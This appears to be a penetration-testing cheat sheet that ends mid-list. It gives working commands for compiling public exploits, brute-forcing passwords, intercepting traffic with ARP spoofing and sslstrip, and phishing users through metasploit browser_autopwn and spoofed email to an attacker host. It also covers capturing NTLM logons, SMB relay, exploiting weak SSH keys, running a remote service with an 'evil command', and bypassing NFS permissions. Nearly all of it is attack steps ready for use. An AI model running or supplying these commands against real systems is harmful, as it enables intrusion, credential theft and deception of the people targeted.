• Via a public exploit: - 
    • search exploitdb for code, check headers for compile info i.e. windows.h (windows) or / sys/socket.h (linux), tailor for use then compile.
    • To compile for windows: - either install windows SDK and run cl file.c or within backtrack run root@bt:~/.wine/drive_c/MinGW/bin# wine gcc -o sploit.exe sploit.c -lwsock32
    • To compile for linux: - gcc file.c -o sploit
  • Via password bruteforce: -
    • check out domain account bruteforce tool in september blog post.
    • hydra / medusa are amoungst the best.
  • Via arpspoofing: -
    • 1. uncomment iptables entries in /etc/etter.conf
      2. echo 1 > /proc/sys/net/ipv4/ip_forward
      3. iptables -t nat -A PREROUTING -i <interface> -p tcp --dport 80 -j REDIRECT --to-port 8080
      4. ettercap -i wlan0 -TqM ARP:REMOTE /TARGET1IP/ /TARGET2IP/
      5. sslstrip -a -l 8080
  • Via a fishing attack: -
    • Setup a metasploit browser exploit generator
      • msfcli auxiliary/server/browser_autopwn lhost=<ATTACKERIP> lport=80 srvhost=<ATTACKERIP> uripath=reports E
      • Spoof an email to the target users with a link to your reports folder:
      • sendemail -t <target_email> -f <spoofed_email> -s <smtp_server> -u <subject>
    • Use metasploit to capture logons
      • use auxiliary/server/capture/http_ntlm set  - set uripath to exchange
      • spoof email to fish users - i.e. "Check out your new outlook web access portal"
    • Use SMB relay
      • Metasploit:  windows/smb/smbrelay- payloads delivered when users connect to \\<ATTACKERIP>\any_fake_share
  • Via Weak SSH Keys: -
    • download weak debian key checker tool from HERE
    • Search for hosts running SSH: nmap -p22 <IPRANGE> --open |grep report |cut -d" " -f5 > ssh-hosts.txt
    • Find vulnerable hosts: for i in $(cat ssh-hosts.txt);do perl host $i;done
    • Follow the rest of the instructions HERE to exploit.
  • Via Weak Service Permissions: -
  • sc \\<TARGET> create <evilservice> binpath= “cmd.exe /k <EVIL COMMAND> then sc \\<TARGET> start <evilservice>
  • Via NFS shares: 
    • showmount -e <IP>
    • mount -t nfs IP:/sharename /tmp/mount
    • to bypass permissions: nfspy -o server=<serverIP>:/<share_name>,hide,allow_other,ro,intr /tmp/mnt
  • Creating wordlists: